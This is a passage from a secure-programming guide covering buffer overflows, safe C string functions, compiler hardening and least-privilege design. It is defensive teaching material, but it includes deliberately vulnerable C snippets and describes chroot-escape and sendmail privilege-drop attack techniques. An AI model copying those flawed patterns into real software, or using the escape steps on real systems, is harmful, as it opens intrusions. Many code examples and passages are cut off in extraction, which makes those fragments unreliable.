synonymous with “URI”, since URLs are the most common kind of URI. For example, the encoding
used in URIs is actually called “URL encoding”.
71
Chapter 6. Restrict Operations to Buffer
Bounds (Avoid Buffer Overflow)
An enemy will overrun the land; he will
pull down your strongholds and plunder
your fortresses.
Amos 3:11 (NIV)
Programs often use memory buffers to capture input and process data. In some cases (particularly in C or
C++ programs) it may be possible to perform an operation, but either read from or write to a memory
location that is outside of the intended boundary of the buffer. In many cases this can lead to an
extremely serious security vulnerability. This is such a common problem that it has a CWE identifier,
CWE-119. Exceeding buffer bounds is a problem with a program’s internal implementation, but it’s such
a common and serious problem that I’ve placed this information in its own chapter.
There are many variations of a failure to restrict operations to buffer bounds. A subcategory of exceeding
buffer bounds is a buffer overflow. The term buffer overflow has a number of varying definitions. For our
purposes, a buffer overflow occurs if a program attempts to write more data in a buffer than it can hold or
write into a memory area outside the boundaries of the buffer. A particularly common situation is writing
character data beyond the end of a buffer (through copying or generation). A buffer overflow can occur
when reading input from the user into a buffer, but it can also occur during other kinds of processing in a
program. Buffer overflows are also called buffer overruns. This subcategory is such a common problem
that it has its own CWE identifier, CWE-120.
Buffer overflows are an extremely common and dangerous security flaw, and in many cases a buffer
overlow can lead immediately to an attacker having complete control over the vulnerable program. To
give you an idea of how important this subject is, at the CERT, 9 of 13 advisories in 1998 and at least
half of the 1999 advisories involved buffer overflows. An informal 1999 survey on Bugtraq found that
approximately 2/3 of the respondents felt that buffer overflows were the leading cause of system security
vulnerability (the remaining respondents identified “mis-configuration” as the leading cause) [Cowan
1999]. This is an old, well-known problem, yet it continues to resurface [McGraw 2000].
Attacks that exploit a buffer overflow vulnerability are often named depending on where the buffer is,
e.g., a “stack smashing” attack attacks a buffer on the stack, while a “heap smashing” attack attacks a
buffer on the heap (memory that is allocated by operators such as malloc and new). More details can be
found from Aleph1 [1996], Mudge [1995], LSD [2001], or the Nathan P. Smith’s Stack Smashing
Security Vulnerabilities website at http://destroy.net/machines/security/. A discussion of the problem and
some ways to counter them is given by Crispin Cowan et al, 2000, at
http://immunix.org/StackGuard/discex00.pdf. A discussion of the problem and some ways to counter
them in Linux is given by Pierre-Alain Fayolle and Vincent Glaume at
http://www.enseirb.fr/~glaume/indexen.html.
Allowing attackers to read data beyond a buffer boundary can also result in vulnerabilities, and this
weakness has its own identifier (CWE-125). For example, the Heartbleed vulnerability was this kind of
weakness. The Heartbleed vulnerability in OpenSSL allowed attackers to extract critically-important
data such as private keys, and then use them (e.g., so they could impersonate trusted sites).
72
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
Most high-level programming languages are essentially immune to exceeding buffer boundaries, either
because they automatically resize arrays (this applies to most languages such as Perl), or because they
normally detect and prevent buffer overflows (e.g., Ada95). However, the C language provides no
protection against such problems, and C++ can be easily used in ways to cause this problem too.
Assembly language and Forth also provide no protection, and some languages that normally include such
protection (e.g., C#, Ada, and Pascal) can have this protection disabled (for performance reasons). Even
if most of your program is written in another language, many library routines are written in C or C++, as
well as “glue” code to call them, so other languages often don’t provide as complete a protection from
buffer overflows as you’d like.
73
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
buf = malloc(len);
read(fd, buf, len); /* len casted to unsigned and overflows */
74
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
Here’s a second example identified by Timo Sirainen, involving integer size truncation. Sometimes the
different sizes of integers can be exploited to cause a buffer overflow. Basically, make sure that you don’t
truncate any integer results used to compute buffer sizes. Here’s Timo’s example for 64-bit architectures:
char *buf;
size_t len;
Here’s a third example from Timo Sirainen, involving integer overflow. This is particularly nasty when
combined with malloc(); an attacker may be able to create a situation where the computed buffer size is
less than the data to be placed in it. Here is Timo’s sample:
/* 3) integer overflow */
char *buf;
size_t len;
75
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
char buf[BUFFER_SIZE];
sprintf(buf, "%*s", sizeof(buf)-1, "long-string"); /* WRONG */
sprintf(buf, "%.*s", sizeof(buf)-1, "long-string"); /* RIGHT */
In theory, sprintf() should be very helpful because you can use it to specify complex formats. Sadly, it’s
easy to get things wrong with sprintf(). If the format is complex, you need to make sure that the
destination is large enough for the largest possible size of the entire format, but the precision field only
controls the size of one parameter. The "largest possible" value is often hard to determine when a
complicated output is being created. If a program doesn’t allocate quite enough space for the longest
possible combination, a buffer overflow vulnerability may open up. Also, sprintf() appends a NUL to the
destination after the entire operation is complete - this extra character is easy to forget and creates an
opportunity for off-by-one errors. So, while this works, it can be painful to use in some circumstances.
76
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
Also, a quick note about the code above - note that the sizeof() operation used the size of an array. If the
code were changed so that “buf” was a pointer to some allocated memory, then all “sizeof()” operations
would have to be changed (or sizeof would just measure the size of a pointer, which isn’t enough space
for most values).
The scanf() family is sadly a little murky as well. An obvious question is whether or not the maximum
width value can be used in %s to prevent these attacks. There are multiple official specifications for
scanf(); some clearly state that the width parameter is the absolutely largest number of characters, while
others aren’t as clear. The biggest problem is implementations; modern implementations that I know of
do support maximum widths, but I cannot say with certainty that all libraries properly implement
maximum widths. The safest approach is to do things yourself in such cases. However, few will fault you
if you simply use scanf and include the widths in the format strings (but don’t forget to count \0, or you’ll
get the wrong length). If you do use scanf, it’s best to include a test in your installation scripts to ensure
that the library properly limits length.
• Imagine code that calls gethostbyname(3) and, if successful, immediately copies hostent->h_name to a
fixed-size buffer using strncpy or snprintf. Using strncpy or snprintf protects against an overflow of an
excessively long fully-qualified domain name (FQDN), so you might think you’re done. However, this
could result in chopping off the end of the FQDN. This may be very undesirable, depending on what
happens next.
• Imagine code that uses strncpy, strncat, snprintf, etc., to copy the full path of a filesystem object to
some buffer. Further imagine that the original value was provided by an untrusted user, and that the
copying is part of a process to pass a resulting computation to a function. Sounds safe, right? Now
imagine that an attacker pads a path with a large number of ’/’s at the beginning. This could result in
future operations being performed on the file “/”. If the program appends values in the belief that the
result will be safe, the program may be exploitable. Or, the attacker could devise a long filename near
the buffer length, so that attempts to append to the filename would silently fail to occur (or only
partially occur in ways that may be exploitable).
When using statically-allocated buffers, you really need to consider the length of the source and
destination arguments. Sanity checking the input and the resulting intermediate computation might deal
with this, too.
77
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
Another alternative is to dynamically reallocate all strings instead of using fixed-size buffers. This
general approach is recommended by the GNU programming guidelines, since it permits programs to
handle arbitrarily-sized inputs (until they run out of memory). Of course, the major problem with
dynamically allocated strings is that you may run out of memory. The memory may even be exhausted at
some other point in the program than the portion where you’re worried about buffer overflows; any
memory allocation can fail. Also, since dynamic reallocation may cause memory to be inefficiently
allocated, it is entirely possible to run out of memory even though technically there is enough virtual
memory available to the program to continue. In addition, before running out of memory the program
will probably use a great deal of virtual memory; this can easily result in “thrashing”, a situation in
which the computer spends all its time just shuttling information between the disk and memory (instead
of doing useful work). This can have the effect of a denial of service attack. Some rational limits on input
size can help here. In general, the program must be designed to fail safely when memory is exhausted if
you use dynamically allocated strings.
Both strlcpy and strlcat take the full size of the destination buffer as a parameter (not the maximum
number of characters to be copied) and guarantee to NIL-terminate the result (as long as size is larger
than 0). Remember that you should include a byte for NIL in the size.
The strlcpy function copies up to size-1 characters from the NUL-terminated string src to dst,
NIL-terminating the result. The strlcat function appends the NIL-terminated string src to the end of dst. It
will append at most size - strlen(dst) - 1 bytes, NIL-terminating the result.
One minor disadvantage of strlcpy(3) and strlcat(3) is that they are not, by default, installed in most
Unix-like systems. In OpenBSD, they are part of <string.h>. This is not that difficult a problem; since
they are small functions, you can even include them in your own program’s source (at least as an option),
and create a small separate package to load them. You can even use autoconf to handle this case
automatically. If more programs use these functions, it won’t be long before these are standard parts of
Linux distributions and other Unix-like systems. Also, these functions have been recently added to the
“glib” library (I submitted the patch to do this), so using recent versions of glib makes them available. In
glib these functions are named g_strlcpy and g_strlcat (not strlcpy or strlcat) to be consistent with the
glib library naming conventions.
Also, strlcat(3) has slightly varying semantics when the provided size is 0 or if there are no NIL
characters in the destination string dst (inside the given number of characters). In OpenBSD, if the size is
0, then the destination string’s length is considered 0. Also, if size is nonzero, but there are no NIL
characters in the destination string (in the size number of characters), then the length of the destination is
considered equal to the size. These rules make handling strings without embedded NILs consistent.
78
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
Unfortunately, at least Solaris doesn’t (at this time) obey these rules, because they weren’t specified in
the original documentation. I’ve talked to Todd Miller, and he and I agree that the OpenBSD semantics
are the correct ones (and that Solaris is incorrect). The reasoning is simple: under no condition should
strlcat or strlcpy ever examine characters in the destination outside of the range of size; such access
might cause core dumps (from accessing out-of-range memory) and even hardware interactions (through
memory-mapped I/O). Thus, given:
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4 because it incorrectly looks at
characters beyond the "size" length in the destination. For now, I suggest avoiding cases where the size is
0 or the destination has no NIL characters. Future versions of glib will hide this difference and always
use the OpenBSD semantics.
Since these functions allocate memory, you must pass the pointer to free(3) to deallocate. These
functions return the number of bytes "printed" (and -1 if there is an error).
These functions are relatively simple to use, and in particular they don’t terminate results in middle (a
problem with any fixed-length buffer solution). Here is an example:
char *result;
asprintf(&result, "x=%s and y=%s\n", x, y);
The asprintf() and vasprintf() functions are widely used to get things done in C without buffer overflows.
One problem with them is that they are not actually standard (they are not in C11). That said, they are
widely implemented; they are in the GNU C library and in the *BSDs (including Apple’s). They are also
relatively trivial to recreate on other systems, e.g., it’s possible to re-implement this on Windows with
less than 20 lines of code. There is some variation in error handling; FreeBSD sets strp to NULL on an
error, while others don’t; users should not depend on either behavior. Another problem is that their wide
use can easily lead to memory leaks; as with any C function that allocates memory, you must manually
deallocate the allocated memory.
6.2.5. libmib
One toolset for C that dynamically reallocates strings automatically is the “libmib allocated string
functions” by Forrest J. Cavalier III, available at http://www.mibsoftware.com/libmib/astring. There are
two variations of libmib; “libmib-open” appears to be clearly open source under its own X11-like license
that permits modification and redistribution, but redistributions must choose a different name, however,
79
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
the developer states that it “may not be fully tested.” To continuously get libmib-mature, you must pay
for a subscription. The documentation is not open source, but it is freely available. If you are considering
the use of this library, you should also look at Messier and Viega’s Safestr library (discussed next).
6.2.8. Libsafe
Arash Baratloo, Timothy Tsai, and Navjot Singh (of Lucent Technologies) have developed Libsafe, a
wrapper of several library functions known to be vulnerable to stack smashing attacks. This wrapper
(which they call a kind of “middleware”) is a simple dynamically loaded library that contains modified
versions of C library functions such as strcpy(3). These modified versions implement the original
functionality, but in a manner that ensures that any buffer overflows are contained within the current
stack frame. Their initial performance analysis suggests that this library’s overhead is very small. Libsafe
papers and source code are available at http://www.research.avayalabs.com/project/libsafe. The Libsafe
source code is available under the completely open source LGPL license.
Libsafe’s approach appears somewhat useful. Libsafe should certainly be considered for inclusion by
Linux distributors, and its approach is worth considering by others as well. For example, I know that the
Mandrake distribution of Linux (version 7.1) includes it. However, as a software developer, Libsafe is a
useful mechanism to support defense-in-depth but it does not really prevent buffer overflows. Here are
several reasons why you shouldn’t depend just on Libsafe during code development:
80
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
• Libsafe only protects a small set of known functions with obvious buffer overflow issues. At the time
of this writing, this list is significantly shorter than the list of functions in this book known to have this
problem. It also won’t protect against code you write yourself (e.g., in a while loop) that causes buffer
overflows.
• Even if libsafe is installed in a distribution, the way it is installed impacts its use. The documentation
recommends setting LD_PRELOAD to cause libsafe’s protections to be enabled, but the problem is
that users can unset this environment variable... causing the protection to be disabled for programs
they execute!
• Libsafe only protects against buffer overflows of the stack onto the return address; you can still
overrun the heap or other variables in that procedure’s frame.
• Unless you can be assured that all deployed platforms will use libsafe (or something like it), you’ll
have to protect your program as though it wasn’t there.
• LibSafe seems to assume that saved frame pointers are at the beginning of each stack frame. This isn’t
always true. Compilers (such as gcc) can optimize away things, and in particular the option
"-fomit-frame-pointer" removes the information that libsafe seems to need. Thus, libsafe may fail to
work for some programs.
The libsafe developers themselves acknowledge that software developers shouldn’t just depend on
libsafe. In their words:
It is generally accepted that the best solution to buffer overflow attacks is to fix the defective programs.
However, fixing defective programs requires knowing that a particular program is defective. The true benefit of
using libsafe and other alternative security measures is protection against future attacks on programs that are
not yet known to be vulnerable.
81
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
but it’s not wise to use this technique as your sole defense. Many such tools only provide a partial
defense. More-complete defenses tend to be slower (and generally people choose to use C/C++ because
performance is important for their application). Also, for open source programs you cannot be certain
what tools will be used to compile the program; using the default “normal” compiler for a given system
might suddenly open security flaws.
Historically a very important tool is “StackGuard”, a modification of the standard GNU C compiler gcc.
StackGuard works by inserting a “guard” value (called a “canary”) in front of the return address; if a
buffer overflow overwrites the return address, the canary’s value (hopefully) changes and the system
detects this before using it. This is quite valuable, but note that this does not protect against buffer
overflows overwriting other values (which they may still be able to use to attack a system). There is work
to extend StackGuard to be able to add canaries to other data items, called “PointGuard”. PointGuard
will automatically protect certain values (e.g., function pointers and longjump buffers). However,
protecting other variable types using PointGuard requires specific programmer intervention (the
programmer has to identify which data values must be protected with canaries). This can be valuable, but
it’s easy to accidentally omit protection for a data value you didn’t think needed protection - but needs it
anyway. More information on StackGuard, PointGuard, and other alternatives is in Cowan [1999].
StackGuard inspired the development of many other run-time mechanisms to detect and counter attacks.
IBM has developed a stack protection system called ProPolice based on the ideas of StackGuard. IBM
doesn’t include the ProPolice name in its current website - it’s just called a "GCC extension for
protecting applications from stack-smashing attacks". However, it’s hard to talk about something without
using a name, so I’ll continue to use the name ProPolice. Like StackGuard, ProPolice is a GCC (Gnu
Compiler Collection) extension for protecting applications from stack-smashing attacks. Applications
written in C are protected by automatically inserting protection code into an application at compilation
time. ProPolice is slightly different than StackGuard, however, by adding three features: (1) reordering
local variables to place buffers after pointers (to avoid the corruption of pointers that could be used to
further corrupt arbitrary memory locations), (2) copying pointers in function arguments to an area
preceding local variable buffers (to prevent the corruption of pointers that could be used to further
corrupt arbitrary memory locations), and (3) omitting instrumentation code from some functions (it
basically assumes that only character arrays are dangerous; while this isn’t strictly true, it’s mostly true,
and as a result ProPolice has better performance while retaining most of its protective capabilities).
Red Hat engineers in 2005 re-implemented buffer overflow countermeasures in GCC based on lessons
learned from ProPolice. They implemented the GCC flags -fstack-protector flag (which only protects
some vulnerable functions), and the -fstack-protector-all flag (which protects all functions). In 2012,
Google engineers added the -fstack-protector-strong flag that tries to strike a better balance (it protects
more functions than -fstack-protector, but not all of them as -fstack-protector-all does). Many Linux
distributions use one of these flags, as a default or for at least some packages, to harden application
programs.
On Windows, Microsoft’s compilers include the /GS option to include StackGuard-like protection
against buffer overflows. However, it’s worth noting that at least on Microsoft Windows 2003 Server
these protection mechanisms can be defeated.
An especially strong hardening approach is "Address Sanitizer" (ASan, also referred to as ASAN and
AddressSanitizer). ASan is available in LLVM and gcc compilers as the "-fsanitize=address" flag. ASan
counters buffer overflow (global/stack/heap), use-after-free, and double-free based attacks. It can also
detect use-after-return and memory leaks. It can also counters some other C/C++ memory issues, but due
to its design it cannot detect read-before-write. Its has a measured overhead of 73% average CPU
overhead (often 2x), with 2x-4x memory overhead; this is low compared to previous approaches, but it is
82
Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
still significant. Still, this is sometimes acceptable overhead for deployment, and it is typically quite
acceptable for testing including fuzz testing. The development processes for Chromium and Firefox, for
example, use ASan. Details of how ASan works is available at
http://code.google.com/p/address-sanitizer/, particularly in the paper "AddressSanitizer: A Fast Address
Sanity Checker" by Konstantin Serebryany, Derek Bruening, Alexander Potapenko, and Dmitry Vyukov
(Google), USENIX ATC 2012 Fundamentally ASan uses "shadow bytes" to record memory
addressability. ASan tracks addressability of memory, where addressability means if a read or write is
permitted. All memory allocations (global, stack, and heap) are aligned to (at least) 8 bytes, and every 8
bytes of memory’s addressability is represented by a "shadow byte". In the shadow byte, a 0 means all 8
bytes addressable, 1..7 means only next N are addressable, and negative (high bit) means no bytes are
addressable. All allocations are surrounded by inaccessible "red zones" (with a default size of 128 bytes).
Every allocation/deallocation in stack and heap manipulates the shadow bytes, and every read/write first
checks the shadow bytes to see if access is allowed. This countermeasure is very strong, though it can be
fooled if a calculated address is in a different valid region. That said, ASan is a remarkably strong
defense for applications written in C or C++, in cases where these overheads are acceptable.
A "non-executable segment" approach was developed by Ingo Molnar, termed Exec Shield. Molnar’s
exec shield limits the region that executable code can exist, and then moves executable code below that
region. If the code is moved to an area where a zero byte must occur, then it’s harder to exploit because
many ASCII-based attacks cannot insert a zero byte. This isn’t foolproof, but it does prevent certain
attacks. However, many programs invoke libraries that in aggregate are so large that their addresses can
have a non-zero in them, making them much more vulnerable.
A different approach is to limit transfer of control; this doesn’t prevent all buffer overflow attacks (e.g.,
those that attack data) but it can make other attacks harder [Kiriansky 2002]
In short, it’s better to work first on developing a correct program that defends itself against buffer
overflows. Then, after you’ve done this, by all means use techniques and tools like StackGuard as an
additional safety net. If you’ve worked hard to eliminate buffer overflows in the code itself, then
StackGuard (and tools like it) are are likely to be more effective because there will be fewer “chinks in
the armor” that StackGuard will be called on to protect.
83
Chapter 7. Design Your Program for Security
Like a city whose walls are broken down
is a man who lacks self-control.
Proverbs 25:28 (NIV)
Some program designs are relatively easy to secure; others are practically impossible. If you want a
secure application, you’ll need to follow good security design principles. In particular, you should
minimize the privileges your program (and its parts) have, so that the inevitable mistakes are much less
likely to become security vulnerabilities.
• Least privilege. Each user and program should operate using the fewest privileges possible. This
principle limits the damage from an accident, error, or attack. It also reduces the number of potential
interactions among privileged programs, so unintentional, unwanted, or improper uses of privilege are
less likely to occur. This idea can be extended to the internals of a program: only the smallest portion
of the program which needs those privileges should have them. See Section 7.4 for more about how to
do this.
• Economy of mechanism/Simplicity. The protection system’s design should be simple and small as
possible. In their words, “techniques such as line-by-line inspection of software and physical
examination of hardware that implements protection mechanisms are necessary. For such techniques
to be successful, a small and simple design is essential.” This is sometimes described as the “KISS”
principle (“keep it simple, stupid”).
• Open design. The protection mechanism must not depend on attacker ignorance. Instead, the
mechanism should be public, depending on the secrecy of relatively few (and easily changeable) items
like passwords or private keys. An open design makes extensive public scrutiny possible, and it also
makes it possible for users to convince themselves that the system about to be used is adequate.
Frankly, it isn’t realistic to try to maintain secrecy for a system that is widely distributed; decompilers
and subverted hardware can quickly expose any “secrets” in an implementation. Even if you pretend
that source code is necessary to find exploits (it isn’t), source code has often been stolen and
redistributed (at least once from Cisco and twice from Microsoft). This is one of the oldest and
strongly supported principles, based on many years in cryptography. For example, the older
Kerckhoffs’s Law states that "A cryptosystem should be designed to be secure if everything is known
about it except the key information." Claude Shannon, the inventor of information theory, restated
Kerckhoff’s Law as: "[Assume] the enemy knows the system." Indeed, security expert Bruce Schneier
goes further and argues that smart engineers should “demand open source code for anything related to
security”, as well as ensuring that it receives widespread review and that any identified problems are
fixed [Schneier 1999].
• Complete mediation. Every access attempt must be checked; position the mechanism so it cannot be
subverted. A synonym for this goal is non-bypassability. For example, in a client-server model,
84
Chapter 7. Design Your Program for Security
generally the server must do all access checking because users can build or modify their own clients.
This is the point of all of Chapter 5, as well as Section 7.2.
• Fail-safe defaults (e.g., permission-based approach). The default should be denial of service, and the
protection scheme should then identify conditions under which access is permitted. See Section 7.7
and Section 7.10 for more.
• Separation of privilege. Ideally, access to objects should depend on more than one condition, so that
defeating one protection system won’t enable complete access.
• Least common mechanism. Minimize the amount and use of shared mechanisms (e.g. use of the /tmp
or /var/tmp directories). Shared objects provide potentially dangerous channels for information flow
and unintended interactions. See Section 7.11 for more information.
• Psychological acceptability / Easy to use. The human interface must be designed for ease of use so
users will routinely and automatically use the protection mechanisms correctly. Mistakes will be
reduced if the security mechanisms closely match the user’s mental image of his or her protection
goals.
A good overview of various design principles for security is available in Peter Neumann’s Principled
Assuredly Trustworthy Composable Architectures. For examples of complete failures to consider these
issues (not limited to information technology), see the "winners" of Privacy International’s "Stupid
Security" Competition.
85
Chapter 7. Design Your Program for Security
86
Chapter 7. Design Your Program for Security
If you’re using a database system (say, by calling its query interface), limit the rights of the database user
that the application uses. For example, don’t give that user access to all of the system stored procedures if
that user only needs access to a handful of user-defined ones. Do everything you can inside stored
procedures. That way, even if someone does manage to force arbitrary strings into the query, the damage
that can be done is limited. If you must directly pass a regular SQL query with client supplied data (and
you usually shouldn’t), wrap it in something that limits its activities (e.g., sp_sqlexec). (My thanks to SPI
Labs for these database system suggestions).
If you must give a program privileges usually reserved for root, consider using POSIX capabilities as
soon as your program can minimize the privileges available to your program. POSIX capabilities are
available in Linux 2.2 and in many other Unix-like systems. By calling cap_set_proc(3) or the
Linux-specific capsetp(3) routines immediately after starting, you can permanently reduce the abilities of
your program to just those abilities it actually needs. For example the network time daemon (ntpd)
traditionally has run as root, because it needs to modify the current time. However, patches have been
developed so ntpd only needs a single capability, CAP_SYS_TIME, so even if an attacker gains control
over ntpd it’s somewhat more difficult to exploit the program.
I say “somewhat limited” because, unless other steps are taken, retaining a privilege using POSIX
capabilities requires that the process continue to have the root user id. Because many important files
(configuration files, binaries, and so on) are owned by root, an attacker controlling a program with such
limited capabilities can still modify key system files and gain full root-level privilege. A Linux kernel
extension (available in versions 2.4.X and 2.2.19+) provides a better way to limit the available privileges:
a program can start as root (with all POSIX capabilities), prune its capabilities down to just what it
needs, call prctl(PR_SET_KEEPCAPS,1), and then use setuid() to change to a non-root process. The
PR_SET_KEEPCAPS setting marks a process so that when a process does a setuid to a nonzero value,
the capabilities aren’t cleared (normally they are cleared). This process setting is cleared on exec().
However, note that PR_SET_KEEPCAPS is a Linux-unique extension for newer versions of the linux
kernel.
One tool you can use to simplify minimizing granted privileges is the “compartment” tool developed by
SuSE. This tool, which only works on Linux, sets the filesystem root, uid, gid, and/or the capability set,
then runs the given program. This is particularly handy for running some other program without
modifying it. Here’s the syntax of version 0.5:
Options:
--chroot path chroot to path
--user user change UID to this user
--group group change GID to this group
--init program execute this program before doing anything
--cap capset set capset name. You can specify several
--verbose be verbose
--quiet do no logging (to syslog)
Thus, you could start a more secure anonymous ftp server using:
87
Chapter 7. Design Your Program for Security
At the time of this writing, the tool is immature and not available on typical Linux distributions, but this
may quickly change. You can download the program via http://www.suse.de/~marc. A similar tool is
dreamland; you can that at http://www.7ka.mipt.ru/~szh/dreamland.
Note that not all Unix-like systems, implement POSIX capabilities, and PR_SET_KEEPCAPS is
currently a Linux-only extension. Thus, these approaches limit portability. However, if you use it merely
as an optional safeguard only where it’s available, using this approach will not really limit portability.
Also, while the Linux kernel version 2.2 and greater includes the low-level calls, the C-level libraries to
make their use easy are not installed on some Linux distributions, slightly complicating their use in
applications. For more information on Linux’s implementation of POSIX capabilities, see
http://linux.kernel.org/pub/linux/libs/security/linux-privs.
FreeBSD has the jail() function for limiting privileges; see the jail documentation for more information.
There are a number of specialized tools and extensions for limiting privileges; see Section 3.10.
POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an
additional form of privilege control to enable more specific control over what privileged processes can do.
Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a
privileged process can perform. By setting specific bits, the actions of privileged processes can be controlled --
access can be granted for various functions only to the specific parts of a program that require them. It is a
security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are
modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the
capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid
program that attempts to drop privileges before executing code that could be dangerous if run as root, such as
what sendmail does. When sendmail attempts to drop privileges using setuid(getuid()), it fails not having the
capabilities required to do so in its bitfields and with no checks on its return value . It continues executing with
superuser privileges, and can run a users .forward file as root leading to a complete compromise.
One approach, used by sendmail, is to attempt to do setuid(0) after a setuid(getuid()); normally this
should fail. If it succeeds, the program should stop. For more information, see
http://sendmail.net/?feed=000607linuxbug. In the short term this might be a good idea in other programs,
though clearly the better long-term approach is to upgrade the underlying system.
88
Chapter 7. Design Your Program for Security
89
Chapter 7. Design Your Program for Security
needed, one approach is to fork into multiple processes, each of which has different privilege.
Communications channels can be set up in a variety of ways; one way is to have a "master" process
create communication channels (say unnamed pipes or unnamed sockets), then fork into different
processes and have each process drop as many privileges as possible. If you’re doing this, be sure to
watch for deadlocks. Then use a simple protocol to allow the less trusted processes to request actions
from the more trusted process(es), and ensure that the more trusted processes only support a limited set
of requests. Setting user and group permissions so that no one else can even start up the sub-programs
makes it harder to break into.
Some operating systems have the concept of multiple layers of trust in a single process, e.g., Multics’
rings. Standard Unix and Linux don’t have a way of separating multiple levels of trust by function inside
a single process like this; a call to the kernel increases privileges, but otherwise a given process has a
single level of trust. This is one area where technologies like Java 2, C# (which copies Java’s approach),
and Fluke (the basis of security-enhanced Linux) have an advantage. For example, Java 2 can specify
fine-grained permissions such as the permission to only open a specific file. However, general-purpose
operating systems do not typically have such abilities at this time; this may change in the near future. For
more about Java, see Section 10.6.
• The program can still use non-filesystem objects that are shared across the entire machine (such as
System V IPC objects and network sockets). It’s best to also use separate pseudo-users and/or groups,
because all Unix-like systems include the ability to isolate users; this will at least limit the damage a
subverted program can do to other programs. Note that current most Unix-like systems (including
Linux) won’t isolate intentionally cooperating programs; if you’re worried about malicious programs
90
Chapter 7. Design Your Program for Security
cooperating, you need to get a system that implements some sort of mandatory access control and/or
limits covert channels.
• Be sure to close any filesystem descriptors to outside files if you don’t want them used later. In
particular, don’t have any descriptors open to directories outside the chroot jail, or set up a situation
where such a descriptor could be given to it (e.g., via Unix sockets or an old implementation of /proc).
If the program is given a descriptor to a directory outside the chroot jail, it could be used to escape out
of the chroot jail.
• The chroot jail has to be set up to be secure - it must never be controlled by a user and every file added
must be carefully examined. Don’t use a normal user’s home directory, subdirectory, or other directory
that can ever be controlled by a user as a chroot jail; use a separate directory directory specially set
aside for the purpose. Using a directory controlled by a user is a disaster - for example, the user could
create a “lib” directory containing a trojaned linker or libc (and could link a setuid root binary into that
space, if the files you save don’t use it). Place the absolute minimum number of files and directories
there. Typically you’ll have a /bin, /etc/, /lib, and maybe one or two others (e.g., /pub if it’s an ftp
server). Place in /bin only what you need to run after doing the chroot(); sometimes you need nothing
at all (try to avoid placing a shell like /bin/sh there, though sometimes that can’t be helped). You may
need a /etc/passwd and /etc/group so file listings can show some correct names, but if so, try not to
include the real system’s values, and certainly replace all passwords with "*".
You need to ensure that either the program running has all the executable code (including libraries), or
that the chroot jail has the code you’ll need. You should place only what you need into the chroot jail.
You could recompile any necessary programs to be statically linked, so that they don’t need
dynamically loaded libraries at all. If you use dynamically-loaded libraries, include only the ones you
need; use ldd(1) to query each program in /bin to find out what it needs (typically they go in /lib or
/usr/lib). On Linux, you’ll probably need a few basic libraries like ld-linux.so.2, and in some
circumstances not much else. You can also use LD_PRELOAD to force some libraries into an
executable’s area, which can help sometimes. A longer discussion on how to use chroot jails is given
in Marc Balmer’s "Using OpenBSDs chrooted httpd". Balmer’s paper is specifically about using
Apache in a chroot jail, but the approaches he discusses can be applied elsewhere too.
It’s usually wiser to completely copy in all files, instead of making hard links; while this wastes some
time and disk space, it makes it so that attacks on the chroot jail files do not automatically propagate
into the regular system’s files. Mounting a /proc filesystem, on systems where this is supported, is
generally unwise. In fact, in very old versions of Linux (versions 2.0.x, at least up through 2.0.38) it’s a
known security flaw, since there are pseudo-directories in /proc that would permit a chroot’ed program
to escape. Linux kernel 2.2 fixed this known problem, but there may be others; if possible, don’t do it.
• Chroot really isn’t effective if the program can acquire root privilege. For example, the program could
use calls like mknod(2) to create a device file that can view physical memory, and then use the
resulting device file to modify kernel memory to give itself whatever privileges it desired. Another
example of how a root program can break out of chroot is demonstrated at
http://www.suid.edu/source/breakchroot.c. In this example, the program opens a file descriptor for the
current directory, creates and chroots into a subdirectory, sets the current directory to the
previously-opened current directory, repeatedly cd’s up from the current directory (which since it is
outside the current chroot succeeds in moving up to the real filesystem root), and then calls chroot on
the result. By the time you read this, these weaknesses may have been plugged, but the reality is that
root privilege has traditionally meant “all privileges” and it’s hard to strip them away. It’s better to
assume that a program requiring continuous root privileges will only be mildly helped using chroot().
Of course, you may be able to break your program into parts, so that at least part of it can be in a
91
Chapter 7. Design Your Program for Security
chroot jail.
92
Chapter 7. Design Your Program for Security
93
Chapter 7. Design Your Program for Security
you carefully filter it as an untrusted (potentially hostile) input. Trusted configuration values should be
loaded from somewhere else entirely (typically from a file in /etc).
94
Chapter 7. Design Your Program for Security
• Interference caused by untrusted processes. Some security taxonomies call this problem a “sequence”
or “non-atomic” condition. These are conditions caused by processes running other, different
programs, which “slip in” other actions between steps of the secure program. These other programs
might be invoked by an attacker specifically to cause the problem. This book will call these
sequencing problems.
• Interference caused by trusted processes (from the secure program’s point of view). Some taxonomies
call these deadlock, livelock, or locking failure conditions. These are conditions caused by processes
running the “same” program. Since these different processes may have the “same” privileges, if not
properly controlled they may be able to interfere with each other in a way other programs can’t.
Sometimes this kind of interference can be exploited. This book will call these locking problems.
95
Chapter 7. Design Your Program for Security
96
Chapter 7. Design Your Program for Security
attacker could create an "old" file, arrange for the tmp cleaner to plan to delete the file, delete the file
himself, and run a secure program that creates the same file - now the tmp cleaner will delete the secure
program’s file! Or, imagine that a secure program can have long delays after using the file (e.g., a setuid
program stopped with SIGSTOP and resumed after many days with SIGCONT, or simply intentionally
creating a lot of work). If the temporary file isn’t used for long enough, its temporary files are likely to be
removed by the tmp cleaner.
The general problem when creating files in these shared directories is that you must guarantee that the
filename you plan to use doesn’t already exist at time of creation, and atomically create the file.
